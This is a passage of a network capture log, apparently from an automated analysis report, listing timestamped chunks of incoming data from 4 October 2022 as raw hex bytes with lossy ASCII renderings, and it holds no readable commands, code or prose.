                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10023INData Raw: 94 22 ed 91 fa da af 3a 5b ff 56 16 5a cb 73 e4 1d 9a 86 09 1d 78 ab b8 e8 d9 2b 31 2e ec 2b a8 15 b7 6c 65 22 bf 73 e4 03 d1 00 e0 ba e7 58 6b ac 95 83 5f 8a 63 1c f3 97 ac f9 6f 58 bb b4 e7 d5 95 34 e0 52 b6 fd 63 fb 9f 17 bf c1 da 11 23 5d 62 58 cf 61 7a dc e3 af f3 cb 4e 31 59 8b ff 99 b5 35 dc be da 09 89 72 67 aa b8 8e 4f f0 eb 01 9d 01 eb 46 81 a2 8a ba 9c 02 7d 82 73 1a 61 84 33 fa 16 7c a9 00 88 be de 9f 27 d5 b4 5b 02 f5 6d 04 b6 84 50 d8 a2 17 2b fd 6f b4 21 4c 96 ca a1 48 31 69 13 2a d9 d3 7c 16 86 a7 c7 79 a0 16 35 72 90 6a fc 39 d5 14 97 0d 76 66 fd 60 3b d9 f7 f0 3a 1a da 6e c1 77 29 5e aa 42 ec 4d f9 4c 02 fd ef ff a7 14 a4 0c fc 4b 2f e7 b9 e2 9e f4 5b ac 57 f2 6a 13 ef 5d 62 a4 0e 3d 1b 86 70 a3 b2 ce 2d 11 cf 70 ed 91 24 a5 6b c7 71 22
                                                                                                                                                                                                                                    Data Ascii: ":[VZsx+1.+le"sXk_coX4Rc#]bXazN1Y5rgOF}sa3|'[mP+o!LH1i*|y5rj9vf`;:nw)^BMLK/[Wj]b=p-p$kq"
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10039INData Raw: ba 4d 3d 97 10 43 91 0f 85 61 71 11 72 b8 af 4c 52 df 25 85 7e 0f 09 9f de 62 7f 97 da 71 af ab 91 f6 ae 46 7b 89 94 43 fb 6c 7a 9c c8 8a 40 81 0a d6 84 44 d8 82 e1 4b 77 a1 8a 79 f3 fa 07 72 68 91 55 f7 3f a3 c6 d9 1d f6 b6 3a f8 2b f3 f6 b9 a8 bb 68 85 44 89 cd ce 21 76 9e 3f dc 97 6f 3f 0c 9f 52 a2 b8 f9 28 44 e7 0d c2 37 c4 4d 60 72 39 c8 9f ce 68 f8 fa b9 f7 6a a1 4b 66 30 86 50 bf c0 a1 dc 97 30 d2 0f b8 3c 0d 78 31 c4 72 e0 86 34 8d 26 05 b8 ef 7f c1 f1 01 ce c0 9e af 6a 4d f9 3a 50 24 ce f6 30 a2 2a 31 b8 97 22 fc 45 87 7e e3 f8 b7 66 52 68 ec 95 8d 36 b6 ee 26 29 fc 49 b9 2f ef bd 85 bb 53 d0 0e 19 bb 0a 16 da 71 c9 53 67 6d 76 48 5b 58 b7 d8 bc 7c 9f e2 5b 5e c7 2f 69 a8 ee 22 95 89 66 23 79 cb 7f 3b f0 f7 a3 be 0f 2c 01 1a 2e 26 3b 8f 9c 23 27
                                                                                                                                                                                                                                    Data Ascii: M=CaqrLR%~bqF{Clz@DKwyrhU?:+hD!v?o?R(D7M`r9hjKf0P0<x1r4&jM:P$0*1"E~fRh6&)I/SqSgmvH[X|[^/i"f#y;,.&;#'
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10055INData Raw: a9 ea ab b4 32 20 4f 96 c7 d1 b5 2f 82 5c 7a 29 8b 2c 68 5c 3b d8 52 d9 80 36 e2 fd 13 fb 8b 6c 62 96 18 8f 04 f6 44 46 9b 30 be eb 03 9f 17 31 a3 19 23 76 96 b7 45 b3 ea 2f 20 eb bc 27 94 ce 86 9e 94 23 d1 df 2c 0b e1 71 01 7b 12 80 6f 01 20 d1 cd 70 23 e5 fc c2 ef 82 fc f9 18 a7 96 a7 37 0a 31 21 7e b4 62 19 29 25 d1 19 b7 1d 5b 3e 2f 50 d7 05 3c 12 72 17 ed 71 60 b6 ba ac 0f 3f 7b 7d 4f ba fd d1 f2 cd 9f e9 70 f7 67 d6 9c 11 fd 8a da b8 38 b5 b1 b9 94 3a e0 32 90 35 5b 19 c9 2f 05 83 b3 91 e9 87 c4 5f 85 a6 fc 82 85 14 d1 60 05 7e 7f be 2d 05 99 ce 0b 48 c1 2e a8 f4 fd e9 3d 52 ed d3 b2 b1 2f 50 b0 e9 44 04 4e 9e e7 52 18 4b 75 4b 2a 12 47 e8 e8 69 77 d9 a3 f7 40 33 1f c1 73 ce c0 58 76 f3 bb c9 f4 bb 80 fc 93 fd 1a 51 ef de ca 96 11 7a d8 60 bf 26 20
                                                                                                                                                                                                                                    Data Ascii: 2 O/\z),h\;R6lbDF01#vE/ '#,q{o p#71!~b)%[>/P<rq`?{}Opg8:25[/_`~-H.=R/PDNRKuK*Giw@3sXvQz`&
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10071INData Raw: 8c d3 50 17 29 4a b1 e0 c4 37 3b 8b b0 d0 78 c9 11 cd 09 94 a8 07 23 50 99 19 e8 5f 1e 9d 9b ac 06 a5 fd a6 12 cd cc 80 e4 3e fd d6 fb 80 e7 b2 25 bc f9 99 75 9c 09 32 73 ce cc 8d c5 79 36 95 4e ac 1f b0 79 8f 83 dc d2 01 18 d4 49 98 86 dc f6 b7 04 04 3f fb 79 86 87 0d 8d 19 d3 ef a0 c8 89 c1 de 37 90 f5 57 76 7e f9 b2 55 be 34 44 0c 66 b9 cf 5b 8d 88 7b 01 e0 b2 ac 21 86 d8 57 57 ab 12 fc 15 a6 79 9a 40 dd d0 5f 36 12 cc 5c ba 1c 68 55 18 1a 54 c0 51 d6 0e ea c2 01 3a 59 3f 61 16 62 a6 03 93 20 39 7a 9b 8e 9c 10 48 88 cb 7b 6b b9 c8 7e ab 42 ac 76 e0 fa e2 05 20 8b fb e0 6a 30 20 6a 49 2c 35 2e 19 00 2a 0b fd ea c9 23 d7 6e 44 c8 57 97 72 c3 4b 32 68 ed 0f 1d 95 c3 fb a4 5e a4 33 04 e8 a4 61 bc 83 5c 03 84 03 16 68 1a 20 45 f4 d8 4f be 33 f9 de 3f 0d 40
                                                                                                                                                                                                                                    Data Ascii: P)J7;x#P_>%u2sy6NyI?y7Wv~U4Df[{!WWy@_6\hUTQ:Y?ab 9zH{k~Bv j0 jI,5.*#nDWrK2h^3a\h EO3?@
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10087INData Raw: 73 07 91 10 8d d8 06 0f a8 03 1a da f0 be f0 f1 eb ab f0 ae f9 fd ef ff 4f 1b af 21 7a ff 89 4c 27 d8 2f e2 7d 53 16 d6 e2 e5 22 f6 94 40 dd 82 28 a9 45 9a a2 3a e2 4a 50 d2 1c 7f 9e d7 13 c5 54 8b e2 8c b3 4d 9e ad c1 5e e5 fe e0 af 6b 0f 34 bf b3 54 36 f1 ff 36 dc ca c5 35 e9 a1 26 39 ca ec 75 25 52 29 c5 d4 ce 9b d4 c7 44 df 7c e1 07 34 95 ec 8b 17 b4 fd a0 43 95 6e 94 64 d6 de 4f 7c fb 2e 54 06 d9 2f f5 47 78 cb 47 cc a6 30 9b 57 08 77 65 a2 ac 09 a2 a4 9f 5e e7 0c bb 3d 06 23 79 63 c3 9a 91 5c a2 b9 7e 7b 04 18 52 1c ae ef 76 d2 bf 21 1c c6 06 3c 06 0f 9b ab 8e 48 74 14 b0 04 59 3e e1 6b 10 b3 b5 3e 2b 71 d1 3a af 98 a9 ca f8 61 f7 16 ee 92 07 2e 41 de ae 54 db 45 6d fe 63 2b fe d3 3c 03 b8 70 fb cd 7f 64 36 de 5f a2 1e 26 d7 02 48 1b 29 24 71 48 a9
                                                                                                                                                                                                                                    Data Ascii: sO!zL'/}S"@(E:JPTM^k4T665&9u%R)D|4CndO|.T/GxG0Wwe^=#yc\~{Rv!<HtY>k>+q:a.ATEmc+<pd6_&H)$qH
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10103INData Raw: 3e aa 37 cb 9f 52 cf ff e3 2c f3 63 25 9f ad 25 fe c5 2d 3d ce 13 4c b1 21 c8 2a af 8a eb 77 7d 0e 62 e1 2a 05 de 70 d6 46 71 7a e1 8f e0 9d 9b 29 d3 dd 0c 8a 8a 12 00 41 da 05 08 31 85 97 4b e0 be 35 fe c8 ee 43 91 d7 3e 71 6c 6e 44 da 6f 18 25 78 9c 0f 14 56 7e b0 ef 69 11 0f 89 b4 8b d5 08 f2 57 24 98 2f 4f 21 d4 f1 f3 9c 4a fb f0 54 93 45 8d a3 44 e4 17 85 ef 6c 6f 12 11 7f bb ce 22 86 0f a9 6d d4 08 a5 5f f3 2c 78 32 ab 5b 5b 1f 9f 41 d7 2e 37 b2 e7 d6 03 24 80 87 6a fb fa b9 94 95 52 97 f0 70 a1 c0 3f bd ff 3a db 70 49 82 11 da 4f ab 0a 8f ce a8 70 95 d3 e0 e3 a3 cd bc 0b 9c 89 2b be ad 54 2b 8c de 0c d6 fa 93 88 f7 6c 89 20 fa 8d 6c 6e a5 bb 25 6e c2 97 b0 a5 84 43 86 70 e2 90 e0 2c 27 df 0c 50 72 e4 f0 ec 41 f0 9b 26 46 8f db 16 32 30 68 fd 64 ba
                                                                                                                                                                                                                                    Data Ascii: >7R,c%%-=L!*w}b*pFqz)A1K5C>qlnDo%xV~iW$/O!JTEDlo"m_,x2[[A.7$jRp?:pIOp+T+l ln%nCp,'PrA&F20hd
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10119INData Raw: 5c a7 7e 3d 6e 18 ec 58 1f 07 8b 71 e4 40 8e 47 50 0e b2 f4 61 77 c0 5b 07 c7 b4 18 da 0e 48 2c 49 1c 9a 0d 29 6f 80 3c 19 9a 4b 6d 0e 5b fc 6f 69 8e 3c 87 6c 98 35 3f 96 d3 2e eb ca 10 7b b5 31 21 ae 9a 13 b2 3d 10 32 fa 96 60 02 70 39 29 7a 25 ff 04 49 68 e2 58 59 82 e9 fe 7e bb 44 f7 08 47 ed 69 7c 39 4c cd 9f 52 dc b2 69 07 9e 0a c3 08 65 25 3c bb f2 e0 0c c6 2a b7 6b 63 9d 7f ef 06 a4 b7 c4 c4 d2 81 ac c0 de bc d1 a6 4c 99 53 b8 48 05 3e 85 d9 6f ec aa e2 a5 e4 2c b5 f1 15 62 05 e3 17 4a 82 9c 60 10 9d 32 6f 81 87 8c 96 b8 d2 54 b0 47 d5 7a 5a 85 d1 63 79 30 c5 58 2f 67 f5 59 ed 0b 75 f4 c3 d1 70 00 d8 60 65 73 9b 2e 41 fc 5c 30 44 81 08 02 f9 94 fb 96 67 76 30 8d 84 99 d5 88 5d 63 aa 06 53 0c d5 8b e9 45 5d 3d fa 73 82 bc 5e 92 03 48 9d 1a 36 04 b1
                                                                                                                                                                                                                                    Data Ascii: \~=nXq@GPaw[H,I)o<Km[oi<l5?.{1!=2`p9)z%IhXY~DGi|9LRie%<*kcLSH>o,bJ`2oTGzZcy0X/gYup`es.A\0Dgv0]cSE]=s^H6
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10135INData Raw: de ff 7b a7 81 41 6c a1 e8 0b c5 62 0a f1 ba ce b1 c2 c8 7a 3c 8c d7 b9 eb 50 c6 36 60 8c 4f 79 1f dc 35 4b ff 2e 1d e6 5c fb f9 36 25 dd 4e 5b 26 99 1e 10 b6 af d8 4f 5a d0 de 5e 50 76 bb 56 dc 17 c5 14 df b8 6d 78 da ea 9e d9 0c 60 69 d5 96 e2 92 7f 42 60 9a 5d ff e6 9e 34 09 c3 33 a1 96 df bf a2 ba de b4 35 ce fb 2b 55 b3 fe e4 ee d1 fa 09 44 4a 54 73 4e d2 7a 4c 7c 57 c8 b2 74 76 0c a0 06 cd cc 4e 9d 62 d7 bd 7e 62 0d bb 5b 74 ef c7 a4 16 8d 49 27 61 23 26 29 cb 3d 5f 4c d3 a3 fc fe 12 19 f5 ed 7e 4b da 03 86 07 5d 95 54 fb dc f6 ef 6a f0 5a 0e 81 dc 67 07 6f 98 45 ac 80 1d aa 51 37 88 f2 26 1d 74 71 1e e5 f0 4b 01 ec c7 8b b5 53 f2 e6 96 a3 93 19 31 5b 92 af 32 50 6d da fb 2e f3 b1 34 d8 cd f6 73 2b 9f 3a df 92 98 da 68 78 df 11 d3 54 82 39 fc cc 7c
                                                                                                                                                                                                                                    Data Ascii: {Albz<P6`Oy5K.\6%N[&OZ^PvVmx`iB`]435+UDJTsNzL|WtvNb~b[tI'a#&)=_L~K]TjZgoEQ7&tqKS1[2Pm.4s+:hxT9|
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10151INData Raw: 40 71 9b 66 f8 dc 6b e9 a8 27 9f b1 e8 2f dd 23 21 7e 08 38 eb 27 62 dd 2a 56 62 7f 02 2b e5 71 cd f6 86 7b 3b bf ae 8f 5d 09 3d 0a b1 1d ec bf 39 09 aa cd a1 7d 71 83 6d 81 eb 91 4f 8d 0e 91 70 c0 d7 8d d6 7d 7d 0b b1 8a a4 f9 b5 cc 47 a3 27 c6 0e c9 de 1e ff 7a 60 a2 44 10 70 e9 8f 1b 3f 8f 92 3d e8 c5 56 6e 71 89 4d 32 a3 df 70 2c 84 6d 92 a6 39 2f 8c 29 87 11 7f 1d 8f 51 78 56 91 3d b6 b3 cb fb 97 7d 3a 5f c1 a3 25 c6 47 c8 cb 6a eb 27 9a d6 76 65 65 d4 80 dc cd 8b 9f 53 fc 9b e0 d6 d4 e8 46 6a 35 ff cb a1 13 e8 80 c4 80 03 b0 3c d2 9d db ec 7d 38 dc 03 f3 a2 2d e0 41 de af 73 ae 4f f2 12 19 5a 26 f9 e7 9c 69 04 c5 ba 9c 4b da 1c a4 a4 d2 b3 d5 05 a6 74 81 50 76 c4 6b f6 53 26 a1 c7 67 f2 f0 6c 90 ad 88 39 03 f5 b7 15 08 8a 99 96 00 df 5d 22 85 23 88
                                                                                                                                                                                                                                    Data Ascii: @qfk'/#!~8'b*Vb+q{;]=9}qmOp}}G'z`Dp?=VnqM2p,m9/)QxV=}:_%Gj'veeSFj5<}8-AsOZ&iKtPvkS&gl9]"#
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10167INData Raw: 18 df aa e7 9a 31 38 1a cb ef ee 91 96 1d 9a 5c a9 3c 62 60 01 05 08 d0 e1 3b 96 0a e0 10 fe ce 51 86 d6 a4 dc bd f7 40 14 c2 14 d6 6b ab 6c a2 de c7 45 c9 54 19 7c db 0f 32 44 0b 78 e1 fc d7 c0 2c 62 40 ca 1e 25 cd e8 73 e6 5b 38 59 1b c4 a1 42 1d 92 88 22 be 88 84 77 35 bf 60 8a 45 11 80 6f 46 b6 17 1b 60 0b c9 bd 56 0b d9 e7 ef 4a 86 78 a9 43 b6 90 5c 6c 9a 04 26 94 dc d8 3a 6f 4b 19 cb ff 98 b8 97 b9 5f 24 85 4d f9 79 f1 57 9a ef 58 46 2c ab 1f 7e c0 db 94 0f 6f ca bc 6a 5e 84 17 2d bc 31 a3 51 f2 3b 7a fb e5 72 1d 6d f5 25 da 29 55 44 a0 d9 92 24 05 5b 99 22 c8 3d 2d b0 73 c8 2e 37 cb b6 cb 2c c8 c4 46 3a 11 0c d4 55 c4 ee 99 1c 6d d6 d1 01 4d ca d0 c9 33 ef 66 e7 ad c5 2b 4c fc 70 6d da 4e 20 30 53 72 1e be 92 fc f6 65 21 bf fe 56 3f 0e b7 c0 d0 9b
                                                                                                                                                                                                                                    Data Ascii: 18\<b`;Q@klET|2Dx,b@%s[8YB"w5`EoF`VJxC\l&:oK_$MyWXF,~oj^-1Q;zrm%)UD$["=-s.7,F:UmM3f+LpmN 0Sre!V?
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10183INData Raw: ad 91 2e e4 ec 2a ec dc 78 c3 79 67 7c 15 3a 99 b1 a3 db 23 f7 4f 34 b7 7b 12 5e 92 6f 1c 1e 49 96 c2 42 79 85 27 5d 43 1c cd 9a 9f 80 81 7d 50 f3 eb d3 4b 5c f6 2b 80 16 1b 31 3c 48 24 21 48 0d 00 35 b8 1c aa 1d ae 95 4c 2f 81 4e 64 bd 66 7a b7 9d 3d 1c 10 d4 de a8 2c 30 a9 a1 de d9 5d 82 d1 55 83 9c 87 1d 0e 32 6a f4 df b5 10 8a b7 80 d5 df 0f d1 cf 1b 11 6c aa 14 f4 10 01 c4 34 de 89 28 7e 74 63 8b 72 77 bc 04 58 d8 46 14 0c 27 52 b1 e4 dd b4 87 d2 5a 26 9f 43 e0 2a a3 0c a4 c4 32 7f 7f 64 ce 74 ef aa ea 68 1c 89 12 24 dd 1d 99 f6 98 d5 39 e5 48 4d 4f d3 6f e5 3a 5c 22 93 53 7e 8c ea e9 4a 30 42 a7 14 59 f1 be a5 49 f7 db 7b 16 5a 2b 6f 0e fc ef 95 da 73 74 2e f7 ce ab 6c e1 69 ba 1a fb 7c 47 12 54 5e 96 97 d3 7c 73 32 2b 8b c1 8e 6a f1 f9 42 df d9 d2
                                                                                                                                                                                                                                    Data Ascii: .*xyg|:#O4{^oIBy']C}PK\+1<H$!H5L/Ndfz=,0]U2jl4(~tcrwXF'RZ&C*2dth$9HMOo:\"S~J0BYI{Z+ost.li|GT^|s2+jB
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10199INData Raw: 56 1f 9f a1 3b 90 03 72 34 f9 e2 f8 cb 2b 7a 39 1e 34 0c bc 35 35 58 3e d6 e4 31 8f d9 f5 5e 28 a4 76 84 4e d1 81 00 64 59 b7 fe 33 fb 60 09 68 47 23 92 49 4e 09 d4 7f 93 d5 61 9c 5d bc 53 c3 03 84 23 d7 71 8d 7c c2 b6 7b 77 52 d8 9b db 5d 52 86 2b 8e c3 ed c7 5d 59 cc 4d b1 ca 2a d1 19 eb d6 82 1b 82 5a d7 ba b1 ee 7e 96 3e 81 bc 22 6b 55 52 6a 6e a9 99 27 14 e1 bf c1 ec 47 d7 ba ea bc 53 cf e3 b8 26 10 86 be 03 2c 1b 0b 36 e7 19 3e df 6e d1 b5 1e 12 fa cb a4 36 f1 34 8a 5f 88 f0 d2 21 5c bd fe 32 40 7c c4 70 88 c1 c6 0b f6 fc a9 71 f0 7b a9 fe 16 ff 03 c9 70 82 77 9b 51 55 a6 57 4c fa ff 3e 9a f8 26 ba cf c3 36 b2 08 1c 71 c4 c8 1c cb fa 9b 85 52 fa 06 98 3e 22 7b 0b ec de 7d 3c 96 0d 86 d6 24 f5 72 69 b6 9e 5a c7 3d 62 bc 9f f1 7f dc 84 a5 d2 fd 6b ef
                                                                                                                                                                                                                                    Data Ascii: V;r4+z9455X>1^(vNdY3`hG#INa]S#q|{wR]R+]YM*Z~>"kURjn'GS&,6>n64_!\2@|pq{pwQUWL>&6qR>"{}<$riZ=bk
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10215INData Raw: 37 3f d2 24 49 57 a6 76 3d a4 e8 fd 31 8b bf 22 99 ae 31 2b 07 00 97 5d eb ea f3 1f 7b d2 90 c2 60 9c 56 a5 c2 dc b9 33 a2 96 01 92 e0 8a bb b2 97 38 35 c9 46 89 eb 58 d7 8b fb 0a 27 2e b4 5a 90 4c 90 aa b1 35 45 d5 6e 6f 03 b9 88 2b f7 0d 89 fe 24 71 69 63 50 49 71 8d 47 b5 dc 32 76 af 5b 74 fd 5d 5f f7 fa ca 79 ce 64 33 53 62 24 f5 fb 6d 2c 2c 5f 6b cb 19 a6 3c 9a ce a0 cc 20 48 f3 d0 19 64 c7 52 44 2d ac a3 05 e8 c6 72 2c 97 24 d8 e0 ef aa 8e c1 1b fa 6e 67 87 9e fa 06 ff 2d e7 94 1e 3e 67 e8 36 bf ee 4b 1e ca 08 73 4e 2b 60 3f e3 6a 29 3b 61 e9 de 17 a7 8d a9 4f 4d 04 16 6c 51 07 2b e8 c6 15 9e ae 4d 39 72 04 35 9d c5 4f 6e 18 d6 0a f8 44 12 fa a0 b4 5d 21 46 03 e4 53 7a 83 62 13 51 49 16 d1 95 85 85 f2 98 96 3c 06 c8 91 74 16 b7 64 7f ff 6f 78 fd e8
                                                                                                                                                                                                                                    Data Ascii: 7?$IWv=1"1+]{`V385FX'.ZL5Eno+$qicPIqG2v[t]_yd3Sb$m,,_k< HdRD-r,$ng->g6KsN+`?j);aOMlQ+M9r5OnD]!FSzbQI<tdox
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10231INData Raw: 79 a0 a7 76 d8 8e 98 65 ed d3 5a 95 d8 e7 55 ff 54 20 ea 06 81 76 1c 14 aa 81 46 5b e4 4f 92 f7 df 1c 20 70 68 b5 8d 90 b8 a4 07 94 7a 6c 0b df 9b 33 e7 5a 27 be 9f 22 7e 9c 26 5d 86 d2 3b 6c 20 ff 00 08 ec fa 89 87 86 e5 b3 56 2e 67 82 ef 07 8e 70 b0 df b2 50 d2 c0 90 f6 a8 8f 67 c2 92 3a ee 80 80 bc b1 f9 8b a8 16 99 25 6c 2b fb 5d 84 8c 28 80 ca 09 62 bb e5 52 42 98 b6 49 2c 67 cb 71 c0 0d 5e 29 b8 c3 be e2 e7 ec c5 8f c1 45 ed b1 4e 7a a3 d0 2f 0c f0 bb 86 4e e2 d9 88 b0 6a 5a 2a 0f b7 05 19 e9 d3 a4 1d 1d 6d 4d ff 62 0f 77 62 fc 58 78 c6 0c b9 b0 45 40 58 8e a0 57 36 3c a9 09 b3 12 32 5d c0 28 bc 4b c6 23 27 02 b0 3d 0d 67 5e 74 50 73 96 07 45 98 fe 20 fc 1d 26 86 a7 1c 61 9f ed 7d fb 94 b5 f9 86 ac ff fd 48 ed 7e b6 8a 20 5b 0b 90 6d 81 94 ab 98 38
                                                                                                                                                                                                                                    Data Ascii: yveZUT vF[O phzl3Z'"~&];l V.gpPg:%l+](bRBI,gq^)ENz/NjZ*mMbwbXxE@XW6<2](K#'=g^tPsE &a}H~ [m8
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10247INData Raw: f4 ba 16 df 74 4f df e5 db a6 45 6c 9b a2 d7 47 c2 bc d5 7e 04 b6 23 54 67 f9 cc 73 09 08 a5 c7 ee 7c a5 80 f6 1c a8 b7 4f 99 1a b3 28 e3 1c ef 4b 80 95 1b 57 20 10 e0 35 36 03 ec 3f 33 38 81 98 c9 0a 2f f1 96 2a 06 52 0b a7 8d 11 69 21 54 0b 58 1a 73 19 e1 37 06 0d 66 1b 05 c2 bd 7a 17 5a 55 62 9a b2 15 7f a9 11 c1 af 43 3e 21 3e b2 f9 0d 59 38 1f 94 c5 bb 4c f3 21 16 58 f5 4c 99 5c 53 07 a2 b7 8e 7c 93 ab 24 de a5 70 f6 85 35 8d 1d 16 12 cb 04 fe 02 c2 b2 31 d7 00 d6 b1 01 ed 6d 0e 92 d8 a6 ac ec 54 2f 13 07 ba 9b 3f d4 e3 72 00 c6 42 aa 56 05 10 5e 1c 72 0f f9 c4 6e 09 2f d5 6b 18 54 d7 d5 c4 18 a4 36 59 6d 76 b9 f4 3d f4 4f a9 42 d7 95 41 e5 7e 65 a4 30 23 98 5b 6a 3b c2 21 d4 05 52 c8 ee 2a ee 21 23 10 01 b1 29 e6 79 95 07 41 58 e4 11 e5 5b 1c c8 bc
                                                                                                                                                                                                                                    Data Ascii: tOElG~#Tgs|O(KW 56?38/*Ri!TXs7fzZUbC>!>Y8L!XL\S|$p51mT/?rBV^rn/kT6Ymv=OBA~e0#[j;!R*!#)yAX[
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10263INData Raw: 79 09 ef 81 48 5c b9 d7 c9 d7 4d 1c 7d 63 4e 17 17 41 8b d7 f6 a2 40 fb 34 9e f6 e0 32 4d c5 13 12 e7 46 18 3d 9d d7 70 79 ff 21 15 7e f6 db bd e0 d5 93 8f 02 63 67 cd 4a b4 3a ca 3a cc 40 ca 7b 5e 03 c1 ba 14 a7 33 86 07 35 f8 87 e8 0e ec 8a 8a a9 37 f4 3d 23 f6 a7 8b 81 b8 0d 68 fd b6 ed 94 07 1c 52 c7 03 37 b9 f3 a7 3e 1f a5 60 b2 6b ce a5 8a a1 45 8e 42 61 98 76 98 73 a1 a8 a1 ee b1 1b a4 2e d8 de 38 df 9f 86 1f 18 45 9a c9 22 00 51 4b d2 44 d6 d1 f0 38 0a fd 3e 19 27 99 6f 53 16 c4 86 48 96 bc cf d0 9c df da 53 53 4c fc e1 5c 69 44 8b 35 22 3f b3 e4 cc c5 c0 c7 fd 61 a5 05 0e 4f a1 e7 fb 75 17 59 a3 bb cb 0b 11 d0 b2 c0 ec 61 ff 12 3e 24 8e 93 f8 2b 40 be bb 7a 00 db 9b b8 bb ee f5 dd cb 50 51 2f 46 b2 c0 ef d3 f5 21 b9 4d d7 d3 83 15 ce 9b bd c9 7f
                                                                                                                                                                                                                                    Data Ascii: yH\M}cNA@42MF=py!~cgJ::@{^357=#hR7>`kEBavs.8E"QKD8>'oSHSSL\iD5"?aOuYa>$+@zPQ/F!M
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10279INData Raw: bb 85 3b be 87 e5 c6 88 0b 75 d9 b7 d4 d8 c4 75 e1 8c b8 45 da d1 c4 9b f4 02 0e 99 a4 e0 50 8a 81 6a ec 3b 23 8e b9 52 6b 06 82 c0 e6 fa 9b 50 c9 7c 78 2e 3c 9a ac 80 09 a4 4d c4 c4 70 27 07 d1 b5 26 73 8f 77 38 92 8c 77 aa e8 f4 10 da 74 af dc 9c 8d 77 ed 79 75 d6 55 83 f9 cd df 0e 14 e0 36 71 c9 ac e4 03 95 bd be 31 3e ed 1f ce 98 b7 2a 61 95 29 04 ed 90 c5 44 de 93 9c ae fe 3d cd b2 df 79 6c 4a f8 15 49 fe d8 ba bf fc 43 73 05 37 d5 54 41 d5 14 65 3c 23 6b 98 30 5d 56 6b 1f 37 ce bf 7a 34 da f5 f7 12 0c 0d ec 52 4d 86 b1 8a f6 a9 6e 4c ae a9 6d ef d0 47 a1 cf 1d 8b 81 b1 22 45 00 98 ce 88 f0 5a 71 82 42 2f a8 a6 a8 e2 ac a3 57 10 6b a3 4d 3e d5 cb 48 5f 19 b3 36 dc da 83 4a b0 09 ca 47 42 0e 25 08 c8 94 e8 88 a9 fd d6 c4 1b 1a d5 b9 cb 8f 0e 0c db df
                                                                                                                                                                                                                                    Data Ascii: ;uuEPj;#RkP|x.<Mp'&sw8wtwyuU6q1>*a)D=ylJICs7TAe<#k0]Vk7z4RMnLmG"EZqB/WkM>H_6JGB%
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10295INData Raw: 94 8d b5 03 62 fc 28 42 f8 38 c6 d0 20 f4 b8 d0 dc a1 88 6e f4 92 77 03 04 de d6 5a 39 7c e5 ef a3 80 22 fc 87 cc 82 4b 73 01 16 50 99 03 5c 97 ce b9 57 03 01 19 9a 0c 22 40 1f 2f 19 ea 5c c3 22 dc 9b 7a 25 34 9d aa 74 ef a6 ab 93 37 99 74 d9 fc b5 86 4d bb 73 c9 c8 39 92 79 cd 84 72 7c 74 88 76 5b 44 92 4a 05 99 34 27 ee 9b 69 90 a1 ff 96 f9 27 29 90 c3 ac 9a 92 4b e9 05 89 46 40 2a cb 7e dc 37 d5 0c d7 53 6d 8a 9f c2 85 5c 7b ac bb 13 c8 c6 67 67 6c 6d 23 b3 aa 2b 8b 97 6e 23 1f a6 08 25 a2 26 ea af 17 58 4b e2 94 1a 89 ba 79 a8 02 3d 38 81 52 8b 26 fd dd 9c a5 93 8f f7 47 f7 2c c4 86 0f e5 b7 09 51 20 eb e4 a1 36 e6 fc 38 97 33 00 e2 6e 54 15 93 40 b8 ca 99 fc 3f 91 c2 64 e9 7f 80 5c df f0 db ac 60 32 45 b6 3b 74 ba 7d f3 c8 18 6d b2 2c bf 5c 46 69 e4
                                                                                                                                                                                                                                    Data Ascii: b(B8 nwZ9|"KsP\W"@/\"z%4t7tMs9yr|tv[DJ4'i')KF@*~7Sm\{gglm#+n#%&XKy=8R&G,Q 683nT@?d\`2E;t}m,\Fi
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10311INData Raw: df 1f 47 5d 44 11 fb 91 10 98 e4 53 b0 67 21 1c 3b 5a 18 47 a8 fd d9 26 20 87 df 59 39 78 11 e9 e4 7d 7d d8 ab 35 fb b5 7d b0 95 e8 71 c8 32 58 7d 0c e7 40 0b 3e f3 f6 d2 d2 6d 0c 60 bc 0c fe 63 48 a5 b9 c9 ef bb 58 ca 89 5a e6 47 b3 4b 00 20 59 e3 f7 69 0f 52 00 83 37 45 61 a7 55 47 ac 4f 7a 61 3d 12 1e 76 f3 9c e7 ee d5 f9 9f cd 72 b0 97 22 40 23 f3 9b 73 da 50 a4 63 00 0a b7 1f 22 11 86 c0 be c2 99 94 3b 48 1c 79 5a ad 30 a3 ff a0 0d 0c 4b 29 d3 ae 6d 35 f6 c2 de 17 12 30 5e e3 c6 a5 e1 56 cc de 2e 32 54 7d 54 2e 9d 75 0b ad 82 1c 12 03 15 49 5b c8 5e 87 f8 2b bb 2e 4b cb d0 2a 5b c2 88 1a b8 6e e1 9f 5b 62 30 db 7a af 07 1a 3c 90 cd 5a a2 a5 da 61 c8 c7 82 75 f3 44 ee 03 bb 80 ca b5 58 b7 ca 3d 44 3f ea 5d 45 d1 eb 26 a3 9f ac 2e 6c be 54 9a 83 d9 ae
                                                                                                                                                                                                                                    Data Ascii: G]DSg!;ZG& Y9x}}5}q2X}@>m`cHXZGK YiR7EaUGOza=vr"@#sPc";HyZ0K)m50^V.2T}T.uI[^+.K*[n[b0z<ZauDX=D?]E&.lT
